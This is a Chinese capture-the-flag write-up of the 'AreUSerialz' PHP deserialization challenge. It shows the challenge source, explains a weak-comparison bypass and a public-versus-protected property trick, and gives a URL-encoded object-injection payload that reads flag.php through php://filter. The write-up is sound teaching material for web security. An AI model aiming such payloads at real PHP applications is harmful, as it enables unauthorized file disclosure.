首页 > 其他分享 >[网鼎杯 2020 青龙组]AreUSerialz

[网鼎杯 2020 青龙组]AreUSerialz

时间:2024-11-05 22:41:09浏览次数:3  
标签:function 序列化 AreUSerialz res 3A% 2020 output 网鼎杯 op

题目链接:[网鼎杯 2020 青龙组]AreUSerialz

打开后,环境如下所示。

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

可以看到,这道题是一道反序列化题。

在题目中,存在两处检测:

  1. 通过阅读源码可知,当 "op" 设置为 2 时,即”读“模式,虽然在反序列化调用的 __destruct 函数中,对 "op" 进行了检测,但是在 process 函数处,代码:else if($this->op == "2") 中又使用了弱类型比较。因此,可以直接在序列化时将 op 设置为 2,这样即可绕过检测。

  2. 通过阅读源码可知,存在 is_valid 函数,会对用户传入的 $_GET['str'] 进行检测,因此在 "protected" 类型的变量反序列时生成的 %00 字符会被检测到,但此处存在漏洞。即,个别版本 PHP 对属性类型不敏感(PHP 7.1+ 版本对属性类型不敏感,本地序列化属性改为 public 的话,与远程服务器属性为 protected 的可兼容),因此,在反序列化时,可以反序列化 public 类型的变量,从而绕过检测。

最终,在读文件时,利用伪协议,读取 flag.php 源码即可。

Payload:?str=O%3A11%3A%22FileHandler%22%3A3%3A%7Bs%3A2%3A%22op%22%3Bi%3A2%3Bs%3A8%3A%22filename%22%3Bs%3A71%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D%2Fvar%2Fwww%2Fhtml%2Fflag.php%22%3Bs%3A7%3A%22content%22%3Bs%3A12%3A%22Hello+World%21%22%3B%7D

标签:function,序列化,AreUSerialz,res,3A%,2020,output,网鼎杯,op
From: https://www.cnblogs.com/imtaieee/p/18529030

相关文章

  • [Zer0pts2020]easy strcmp
    [Zer0pts2020]easystrcmpdie查壳找到加密函数如何找到加密函数的找到init函数,跟进funcs_889、跟进使用x交叉引用qword_201090即可找到主加密函数那这个加密函数是如何连上main函数的呢?mainmain函数这里运用了strcmp,但我们却找不到strcmp到底对比了什么但根据我......
  • [MRCTF2020]Ezpop
    先放源码点击查看代码Welcometoindex.php<?php//flagisinflag.php//WTFISTHIS?//LearnFromhttps://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//AndCrackIt!classModifier{protected......
  • P6879 [JOI 2020 Final] スタンプラリー 3 [区间DP]
    P6879[JOI2020Final]スタンプラリー3Solution首先这是一道最优值问题,再根据数据范围\(n\le200\),那么正解可能会是\(O(n^3)\)的DP。根据题意,我们发现主角走过的雕像一定是个区间,可以考虑区间DP。想一想我们需要知道什么,然后把它放到DP状态里面。我们需要知道......
  • 2024年第四届“网鼎杯”网络安全大赛 青龙组 MICS-WriteUp
    文章目录一、前言二、MISCMISC01MICS02MISC03MICS04一、前言两年一届的网络安全"奥运会"也是有幸参加!是一个非常有意思的比赛,其余附件及需要的工具已打包完毕~123网盘下载:https://www.123684.com/s/q2J1jv-MuJvd提取码:0905提取码:0905二、MISCMISC01解......
  • [ACTF2020 新生赛]BackupFile
    题目链接:https://buuoj.cn/challenges#[ACTF2020新生赛]BackupFile打开环境后如下。题目中仅有一句"Trytofindoutsourcefile!"的提示,因此直接扫描一下备份文件,发现存在"index.php.bak"文件,该文件代码如下所示。<?phpinclude_once"flag.php";if(isset($_GET['key......
  • [BJDCTF2020]Easy MD5
    题目链接:https://buuoj.cn/challenges#[BJDCTF2020]EasyMD5打开环境后如下所示。响应包如下。HTTP/1.1200OKServer:openrestyDate:Fri,25Oct202415:20:01GMTContent-Type:text/html;charset=UTF-8Connection:keep-aliveVary:Accept-EncodingX-Powered-By:......
  • [MRCTF2020]你传你呢
    题目链接:https://buuoj.cn/challenges#[MRCTF2020]你传你......
  • [ACTF2020 新生赛]Upload
    题目链接:https://buuoj.cn/challenges#[ACTF2020新生赛]Upload打开环境后如下所示。指向灯泡,可以发现存在一个上传功能。尝试先上传".php"后缀文件,响应包如下。题目提示"nonono~Badfile!",此处笔者直接修改后缀为".phtml"后,发现可以成功上传,并且网页告知了上传的文件......
  • [ACTF2020 新生赛]Include
    链接:https://buuoj.cn/challenges#[ACTF2020新生赛]Include。打开环境后如下,只有一个"tips"的超链接。访问tips,留意传入了"file"参数。接下来,可以尝试下路径穿越:?file=flag.php../../../../../etc/passwd。可以看到,存在路径穿越漏洞,但是通过路径穿越漏洞并没有读取到......
  • [ACTF2020 新生赛]Exec
    题目链接:https://buuoj.cn/challenges#[ACTF2020新生赛]Exec。打开后,环境如下。尝试输入"127.0.0.1",抓取请求包。POST/HTTP/1.1Host:038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81Content-Length:16Cache-Control:max-age=0Upgrade-Insecure-Requests:......